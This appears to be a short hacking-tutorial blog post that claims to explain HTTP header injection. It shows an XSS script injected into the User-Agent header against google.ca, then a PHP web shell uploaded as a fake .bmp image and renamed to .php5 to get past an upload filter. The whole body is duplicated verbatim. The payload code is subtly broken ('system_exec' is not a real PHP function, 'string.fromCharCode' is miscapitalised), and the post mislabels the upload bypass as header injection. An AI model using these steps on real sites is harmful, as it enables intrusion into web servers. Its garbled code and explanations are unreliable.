1. What is HTTP header injection?
HTTP header injection is a vulnerability which occurs when HTTP headers are based on user input. Header injection in
HTTP responses can allow HTTP response splitting and XSS attacks.
2. HTTP Header Injection
We can use "Live HTTP Headers" or "Tamper Data" if we are using Firefox. Say this is what is getting recorded when you enter google.ca.
Host [google.ca]
User-Agent [Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4]
Accept [text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language [en-us,en;q=0.5]
Accept-Encoding [gzip, deflate]
Accept-Charset [ISO-8859-1,utf-8;q=0.7,*;q=0.7]
Keep-Alive [300]
Connection [keep-alive]
Now, with Tamper Data or Live HTTP Headers, we will change the User Agent to:
Host [google.ca]
User-Agent [<script>alert(string.fromCharCode(88,83,83))</script>]
Accept [text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language [en-us,en;q=0.5]
Accept-Encoding [gzip, deflate]
Accept-Charset [ISO-8859-1,utf-8;q=0.7,*;q=0.7]
Keep-Alive [300]
Connection [keep-alive]
Now, click "OK" if you are using Tamper Data, and click "Replay" if you are using Live HTTP Headers.
If we want to upload something like a shell when we upload our "image" in an image upload form, this is what we get:
Host [google.ca]
User-Agent [Mozilla/5.0 and all that other stuff...]
Accept [text/html,application/xhtml+xml, etc...]
Accept-Language [en-us,en;q=0.6]
Accept-Encoding [gzip,deflate]
Accept-Charset [ISOKAOAKOFASfaS]
Keep-Alive [300]
Connection [keep-alive]
Referrer [google.ca]
Content-Type [multipart/form-data; boundary=[--29847239576353486787]
Content-Disposition: form-data;name="image"; filename="pedobear.bmp"
Content-Type: image/bmp
<?php
// System EXEC example
system_exec('whoami');
?>
-- 29847239576353486787
We can see the PHP code, so now we want to change the name to something like PHP5 or PHP:
Content-Disposition: form-data;name="image";filename="pedobear.php5"
Content-Type: image/bmp
<?php
// System EXEC example
system_exec('whoami');
?>
Now, we get an error about sending the POST is being too long. Just send it again without the content-length.
If the upload form is vulnerable, you will get the shell.
HTTP header injection is a vulnerability which occurs when HTTP headers are based on user input. Header injection in
HTTP responses can allow HTTP response splitting and XSS attacks.
2. HTTP Header Injection
We can use "Live HTTP Headers" or "Tamper Data" if we are using Firefox. Say this is what is getting recorded when you enter google.ca.
Host [google.ca]
User-Agent [Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4]
Accept [text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language [en-us,en;q=0.5]
Accept-Encoding [gzip, deflate]
Accept-Charset [ISO-8859-1,utf-8;q=0.7,*;q=0.7]
Keep-Alive [300]
Connection [keep-alive]
Now, with Tamper Data or Live HTTP Headers, we will change the User Agent to:
Host [google.ca]
User-Agent [<script>alert(string.fromCharCode(88,83,83))</script>]
Accept [text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language [en-us,en;q=0.5]
Accept-Encoding [gzip, deflate]
Accept-Charset [ISO-8859-1,utf-8;q=0.7,*;q=0.7]
Keep-Alive [300]
Connection [keep-alive]
Now, click "OK" if you are using Tamper Data, and click "Replay" if you are using Live HTTP Headers.
If we want to upload something like a shell when we upload our "image" in an image upload form, this is what we get:
Host [google.ca]
User-Agent [Mozilla/5.0 and all that other stuff...]
Accept [text/html,application/xhtml+xml, etc...]
Accept-Language [en-us,en;q=0.6]
Accept-Encoding [gzip,deflate]
Accept-Charset [ISOKAOAKOFASfaS]
Keep-Alive [300]
Connection [keep-alive]
Referrer [google.ca]
Content-Type [multipart/form-data; boundary=[--29847239576353486787]
Content-Disposition: form-data;name="image"; filename="pedobear.bmp"
Content-Type: image/bmp
<?php
// System EXEC example
system_exec('whoami');
?>
-- 29847239576353486787
We can see the PHP code, so now we want to change the name to something like PHP5 or PHP:
Content-Disposition: form-data;name="image";filename="pedobear.php5"
Content-Type: image/bmp
<?php
// System EXEC example
system_exec('whoami');
?>
Now, we get an error about sending the POST is being too long. Just send it again without the content-length.
If the upload form is vulnerable, you will get the shell.
Post a Comment